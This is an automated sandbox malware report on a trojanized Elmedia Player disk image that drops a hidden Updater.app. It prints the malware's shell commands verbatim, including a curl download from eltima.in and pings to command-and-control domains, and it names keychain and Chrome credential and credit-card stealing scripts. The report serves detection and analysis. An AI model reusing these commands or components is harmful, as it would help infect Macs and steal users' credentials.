Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:21.0.0
Analysis ID:44833
Start time:15:07:04
Joe Sandbox Product:Cloud
Start date:23.10.2017
Overall analysis duration:0h 14m 55s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:eY60uYkZgM (renamed file extension from none to dmg)
Cookbook file name:defaultmacfilecookbook.jbs
Analysis system description:Mac Mini, El Capitan 10.11.6 (MS Office 15.25, Java 1.8.0_131)
Detection:MAL
Classification:mal72.troj.spyw.evad.macDMG@0/37@23/0


Detection

StrategyScoreRangeReportingDetection
Threshold720 - 100Report FP / FNmalicious


Classification

Signature Overview

Click to jump to signature section


Cryptography:

barindex
Creates files with functionality related to DES encryption and/or decryptionShow sources
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.pyFound S1 S-Box: [14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13]
Executes the "openssl" command used for crypographic operationsShow sources
Source: /bin/sh (PID: 528)Openssl executable: /usr/bin/openssl -> openssl rsautl -verify -in /tmp/Updater.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Writes files containing public keys to diskShow sources
Source: /usr/bin/unzip (PID: 524)File created 'PUBLIC KEY' pattern: /private/tmp/Updater.app/Contents/MacOS/Updater
Source: /bin/sh (PID: 527)File created 'PUBLIC KEY' pattern: /private/tmp/public.pem

Networking:

barindex
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: appstatico.eltima.com
Reads from file descriptors related to (network) socketsShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Reads from socket in process: data
Source: /usr/bin/curl (PID: 533)Reads from socket in process: data
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49217
Writes from file descriptors related to (network) socketsShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Writes from socket in process: data
Source: /usr/bin/curl (PID: 533)Writes from socket in process: data
Source: /usr/bin/curl (PID: 539)Writes from socket in process: data
Detected non-DNS traffic on DNS portShow sources
Source: global trafficTCP traffic: 192.168.0.50:49216 -> 8.8.8.8:53
Executes the "nc" (netcat) command used to establish arbitrary TCP or UDP connections and listensShow sources
Source: /bin/sh (PID: 530)Netcat executable: /usr/bin/nc -> nc -G 20 -z 8.8.8.8 53
Pings several hosts (probably to check C&C connectivity)Show sources
Source: Ping host argumentsMore than 5 different servers pinged: ypu4vwlenakpt29f95etrqllq.com, eltimastore.cc, aslkdwilkaleopaela.com, fyamakgtaajt9vrwhmc76v38.com, eltima.in, ksldewioweiqiedklsakdnkld.com, dakadaoqoqimmsdssksjdsk.com, qweiqqwkwqehiqejkehiohqehqewq.com, qrbdcwwwe9pxmqsadjaksioie9.com, kcdjzquvhsuka6hlfbmjzkzsb.com, eltimastore.in

System Summary:

barindex
Classification labelShow sources
Source: classification engineClassification label: mal72.troj.spyw.evad.macDMG@0/37@23/0

Data Obfuscation:

barindex
Imports the IOKit library (often used to register services)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
Imports the Security library (often used for certificate, key, keychain, or secure transport handling)Show sources
Source: initial sampleStatic MACH information: dylib_command -> /System/Library/Frameworks/Security.framework/Versions/A/Security

Persistence and Installation Behavior:

barindex
Creates application bundles containing icon filesShow sources
Source: /usr/bin/unzip (PID: 524)Icon file created: /tmp/Updater.app/Contents/Resources/Finder.icns
Source: /usr/bin/unzip (PID: 524)Icon file created: /tmp/Updater.app/Contents/Resources/t.icns
Reads data from the local random generatorShow sources
Source: /usr/bin/open (PID: 521)Random device file read: /dev/random
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Random device file read: /dev/random
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Random device file read: /dev/random
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Random device file read: /dev/random
Source: /usr/bin/openssl (PID: 528)Random device file read: /dev/urandom
Source: /usr/bin/curl (PID: 533)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 533)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 539)Random device file read: /dev/random
Source: /usr/bin/curl (PID: 539)Random device file read: /dev/random
Uses AppleKeyboardLayouts bundle containing keyboard layoutsShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)AppleKeyboardLayouts info plist opened: /System/Library/Keyboard Layouts/AppleKeyboardLayouts.bundle/Contents/Info.plist
Writes property list (.plist) files to diskShow sources
Source: /usr/bin/unzip (PID: 524)XML plist file created: /private/tmp/Updater.app/Contents/Info.plist
Source: /usr/bin/unzip (PID: 524)Binary plist file created: /private/tmp/Updater.app/Contents/Resources/MainMenu.nib
Changes permissions of written Mach-O filesShow sources
Source: /usr/bin/unzip (PID: 524)Permissions modifiied for written 64-bit Mach-O /private/tmp/Updater.app/Contents/MacOS/Updater: bits: - usr: rx grp: rx all: rwx
Checks the current date and time via Internet using a shell commandShow sources
Source: /bin/sh (PID: 533)HTTP request via command: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Creates Python files with suspicious function namesShow sources
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def checkValidKeychain(self):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def getKeyblobRecord(self, base_addr, offset):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def getEncryptedDatainBlob(self, BlobBuf):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def getKeychainTime(self, BASE_ADDR, pCol):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def DBBlobDecryption(self, securestoragegroup, dbkey):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def KeyblobDecryption(self, encryptedblob, iv, dbkey):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def KeyblobDecryption(self, encryptedblob, iv, dbkey):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def generateMasterKey(self, pw, symmetrickey_offset):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def findWrappingKey(self, master, symmetrickey_offset):
Source: /private/tmp/Updater.app/Contents/Resources/cb.pySuspicious function name: def kcdecrypt(key, iv, data):
Source: /private/tmp/Updater.app/Contents/Resources/ch.pySuspicious function name: def chrome_decrypt(encrypted, iv, key):
Source: /private/tmp/Updater.app/Contents/Resources/pbkdf2.pySuspicious function name: def xorstr(a, b):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.pySuspicious function name: def xorstr(self, x, y):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.pySuspicious function name: def encrypt(self, data, pad=''):
Source: /private/tmp/Updater.app/Contents/Resources/pyDes.pySuspicious function name: def decrypt(self, data, pad=''):
Creates application bundlesShow sources
Source: /usr/bin/unzip (PID: 524)Bundle Info.plist file created: /tmp/Updater.app/Contents/Info.plist
Creates hidden files, links and/or directoriesShow sources
Source: /usr/bin/unzip (PID: 524)Hidden file created: /tmp/Updater.app/Contents/Resources/.checksum
Source: /usr/bin/unzip (PID: 524)Hidden file created: /tmp/Updater.app/Contents/Resources/.crc32
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.p7191h
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.CUKIia
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.AE4NNA
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Hidden file created: /Users/vreni/Library/Preferences/.dat.nosync020a.dYwjXv
Executes commands using a shell command-line interpreterShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519)Shell command executed: /bin/sh -c open '/Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app'
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519)Shell command executed: /bin/sh -c unzip -d /tmp /Users/vreni/Desktop/unpack/Elmedia\ Player/Elmedia\ Player.app/Contents/Resources/.pl.zip && open /tmp/Updater.app
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvceoh2bLtCGhgMM6SHvse8qFPKI4yX/RLAfKSvccClFnV7WQqlqVEZ/xL9/wQ6uSbwEUxwweq9lu8CMSucKR881zSFHBoj2epoHFbJoJmI3Cn8GHLZs+JbDss/kxrtNDTBYXAC6jL0xwPj4zj2LdvuSLvkh25egGmc/M3IXEjBtjSBvjEjWF5/QD0oDfKXs/j6OvurrjSReqxwZFKcOc5RH2hTRj2wu/Kuz7yVFeRrpCusjuVteq8ePFT7UF7QnXgfGvsxMsv3cItmoEJYkz1xcVyfknIlIaqsJrDT0zjn61Vsj9ywB8WeK2g9BSublBZ7PN5jHXdZWudgtrExHvUwIDAQAB-----END PUBLIC KEY-----' > /tmp/public.pem openssl rsautl -verify -in /tmp/Updater.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c nc -G 20 -z 8.8.8.8 53 >/dev/null 2>&1 && echo success
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c hcresult=`curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` && echo $hcresult
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c a90=`curl -s --connect-timeout 10 -o /tmp/au https://eltima.in/rsa` && echo && echo '-----BEGIN PUBLIC KEY-----MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6BmQXbeRPZ3z+GZCo4I01xmx96ODUQ885MqCEazpcaGcbmctYvTd/RINnQFLjKh7leSXgA8gZg77CZldsjYtt0v8cvv7SYqbZiwGy1e2kYtz0sEtBEdbiGxSNNWw+TXlGQ+SV5WTJuK36HBWW/wfOY9dbsJnz7vv8nhh26Vpa8Krd1gfIFT3D/Vz9eB4vtGXBBZNU3+jP6VvdXna5NgC1zZW5DpKWXCSf3KjZwwH+Vy9WgnGeTpUPMeUJKTngNVA5BzJj65NgcRq5KmnQZsNanKn6NjL3l/h2QrZfvpCSDWWEJ05FhKnAbPshF+VEe+bBJnPnOOndTFsbWZDyYOgdQIDAQAB-----END PUBLIC KEY-----' > /tmp/au.pub && echo success
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 eltima.in 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 eltimastore.in 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 eltimastore.cc 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 aslkdwilkaleopaela.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 ksldewioweiqiedklsakdnkld.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 dakadaoqoqimmsdssksjdsk.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 qweiqqwkwqehiqejkehiohqehqewq.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 qrbdcwwwe9pxmqsadjaksioie9.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 fyamakgtaajt9vrwhmc76v38.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 kcdjzquvhsuka6hlfbmjzkzsb.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c ping -c 1 ypu4vwlenakpt29f95etrqllq.com 2>/dev/null >/dev/null && echo 0
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Shell command executed: /bin/sh -c if [ -f /Library/.cache/.ptrun ] then echo success fi
Executes the "curl" command used to transfer data via the network (usually using HTTP/S)Show sources
Source: /bin/sh (PID: 533)Curl executable: /usr/bin/curl -> curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 539)Curl executable: /usr/bin/curl -> curl -s --connect-timeout 10 -o /tmp/au https://eltima.in/rsa
Executes the "ping" command used for connectivity testing via ICMPShow sources
Source: /bin/sh (PID: 541)Ping executable: /sbin/ping -> ping -c 1 eltima.in
Source: /bin/sh (PID: 543)Ping executable: /sbin/ping -> ping -c 1 eltimastore.in
Source: /bin/sh (PID: 545)Ping executable: /sbin/ping -> ping -c 1 eltimastore.cc
Source: /bin/sh (PID: 547)Ping executable: /sbin/ping -> ping -c 1 aslkdwilkaleopaela.com
Source: /bin/sh (PID: 549)Ping executable: /sbin/ping -> ping -c 1 ksldewioweiqiedklsakdnkld.com
Source: /bin/sh (PID: 551)Ping executable: /sbin/ping -> ping -c 1 dakadaoqoqimmsdssksjdsk.com
Source: /bin/sh (PID: 553)Ping executable: /sbin/ping -> ping -c 1 qweiqqwkwqehiqejkehiohqehqewq.com
Source: /bin/sh (PID: 555)Ping executable: /sbin/ping -> ping -c 1 qrbdcwwwe9pxmqsadjaksioie9.com
Source: /bin/sh (PID: 557)Ping executable: /sbin/ping -> ping -c 1 fyamakgtaajt9vrwhmc76v38.com
Source: /bin/sh (PID: 559)Ping executable: /sbin/ping -> ping -c 1 kcdjzquvhsuka6hlfbmjzkzsb.com
Source: /bin/sh (PID: 562)Ping executable: /sbin/ping -> ping -c 1 ypu4vwlenakpt29f95etrqllq.com
Opens applications that may be created onesShow sources
Source: /bin/sh (PID: 521)Application opened: open /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app
Source: /bin/sh (PID: 525)Application opened: open /tmp/Updater.app
Reads launchservices plist filesShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Reads user launchservices plist file containing default apps for corresponding filetypesShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Preferences launchservices plist file read: /Users/vreni/Library/Preferences/com.apple.LaunchServices/com.apple.launchservices.secure.plist
Uses CFNetwork bundle containing interfaces for network communication (HTTP, sockets, and Bonjour)Show sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)CFNetwork info plist opened: /System/Library/Frameworks/CFNetwork.framework/Resources/Info.plist
Writes 64-bit Mach-O files to diskShow sources
Source: /usr/bin/unzip (PID: 524)File written: /private/tmp/Updater.app/Contents/MacOS/Updater
Writes Mach-O files to the tmp directoryShow sources
Source: /usr/bin/unzip (PID: 524)64-bit Mach-O written to tmp path: /private/tmp/Updater.app/Contents/MacOS/Updater
Writes Python files to diskShow sources
Source: /usr/bin/unzip (PID: 524)Python file created: /private/tmp/Updater.app/Contents/Resources/cb.py
Source: /usr/bin/unzip (PID: 524)Python file created: /private/tmp/Updater.app/Contents/Resources/ch.py
Source: /usr/bin/unzip (PID: 524)Python file created: /private/tmp/Updater.app/Contents/Resources/pbkdf2.py
Source: /usr/bin/unzip (PID: 524)Python file created: /private/tmp/Updater.app/Contents/Resources/pyDes.py
Source: /usr/bin/unzip (PID: 524)Python file created: /private/tmp/Updater.app/Contents/Resources/Schema.py
Writes icon files to diskShow sources
Source: /usr/bin/unzip (PID: 524)File written: /private/tmp/Updater.app/Contents/Resources/Finder.icns
Source: /usr/bin/unzip (PID: 524)File written: /private/tmp/Updater.app/Contents/Resources/t.icns
Many shell processes execute programs via execve syscall (may be indicative for malicious behaviour)Show sources
Source: /bin/sh (PID: 521)Shell process: open /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app
Source: /bin/sh (PID: 524)Shell process: unzip -d /tmp /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/.pl.zip
Source: /bin/sh (PID: 525)Shell process: open /tmp/Updater.app
Source: /bin/sh (PID: 528)Shell process: openssl rsautl -verify -in /tmp/Updater.app/Contents/Resources/.checksum -pubin -inkey /tmp/public.pem
Source: /bin/sh (PID: 530)Shell process: nc -G 20 -z 8.8.8.8 53
Source: /bin/sh (PID: 533)Shell process: curl -sL https://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec
Source: /bin/sh (PID: 539)Shell process: curl -s --connect-timeout 10 -o /tmp/au https://eltima.in/rsa
Source: /bin/sh (PID: 541)Shell process: ping -c 1 eltima.in
Source: /bin/sh (PID: 543)Shell process: ping -c 1 eltimastore.in
Source: /bin/sh (PID: 545)Shell process: ping -c 1 eltimastore.cc
Source: /bin/sh (PID: 547)Shell process: ping -c 1 aslkdwilkaleopaela.com
Source: /bin/sh (PID: 549)Shell process: ping -c 1 ksldewioweiqiedklsakdnkld.com
Source: /bin/sh (PID: 551)Shell process: ping -c 1 dakadaoqoqimmsdssksjdsk.com
Source: /bin/sh (PID: 553)Shell process: ping -c 1 qweiqqwkwqehiqejkehiohqehqewq.com
Source: /bin/sh (PID: 555)Shell process: ping -c 1 qrbdcwwwe9pxmqsadjaksioie9.com
Source: /bin/sh (PID: 557)Shell process: ping -c 1 fyamakgtaajt9vrwhmc76v38.com
Source: /bin/sh (PID: 559)Shell process: ping -c 1 kcdjzquvhsuka6hlfbmjzkzsb.com
Source: /bin/sh (PID: 562)Shell process: ping -c 1 ypu4vwlenakpt29f95etrqllq.com

Hooking and other Techniques for Hiding and Protection:

barindex
Denies being traced/debugged (via ptrace PT_DENY_ATTACH)Show sources
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)PTRACE system call (PT_DENY_ATTACH): PID 526 denies future traces

HIPS / PFW / Operating System Protection Evasion:

barindex
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)Show sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl read request: kern.safeboot (1.66)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Sysctl read request: kern.safeboot (1.66)

Language, Device and Operating System Detection:

barindex
Reads the system or server version plist fileShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 519)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 521)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /usr/bin/open (PID: 525)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plist
Reads hardware related sysctl valuesShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl read request: hw.ncpu (6.3)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl read request: hw.cpu_freq (6.15)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl read request: hw.availcpu (6.25)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Sysctl read request: hw.ncpu (6.3)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Sysctl read request: hw.cpu_freq (6.15)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Sysctl read request: hw.availcpu (6.25)
Reads the kernel OS version valueShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl read request: kern.osversion (1.65)
Source: /tmp/Updater.app/Contents/MacOS/Updater (PID: 526)Sysctl read request: kern.osversion (1.65)
Reads the systems OS release and/or typeShow sources
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl requested: kern.ostype (1.1)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 533)Sysctl requested: kern.osrelease (1.2)
Source: /usr/bin/curl (PID: 539)Sysctl requested: kern.osrelease (1.2)
Reads the systems hostnameShow sources
Source: /bin/sh (PID: 521)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 523)Sysctl requested: kern.hostname (1.10)
Source: /Users/vreni/Desktop/unpack/Elmedia Player/Elmedia Player.app/Contents/Resources/Elmedia Player.app/Contents/MacOS/Elmedia Player (PID: 522)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 527)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 529)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 531)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 537)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 540)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 542)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 544)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 546)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 548)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 550)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 552)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 554)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 556)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 558)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 561)Sysctl requested: kern.hostname (1.10)
Source: /bin/sh (PID: 563)Sysctl requested: kern.hostname (1.10)

Stealing of Sensitive Information:

barindex
Creates files with functionality probably related to stealing credentials in ChromeShow sources
Source: /private/tmp/Updater.app/Contents/Resources/ch.pyFound specific keywords: <chrome-record>, <login>, <password>
Creates files with functionality probably related to stealing credit card informationShow sources
Source: /private/tmp/Updater.app/Contents/Resources/ch.pyFound specific keywords: expiration, credit_card, amex, visa, mastercard, discover
Uses Python chainbreaker to extract user credentials from keychain filesShow sources
Source: /private/tmp/Updater.app/Contents/Resources/cb.pyString pattern found: "Tool for OS X Keychain Analysis by @n0fate"


Runtime Messages

Command:open
Exitcode:0
Killed:False
Standard Output:
Standard Error:

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

Screenshot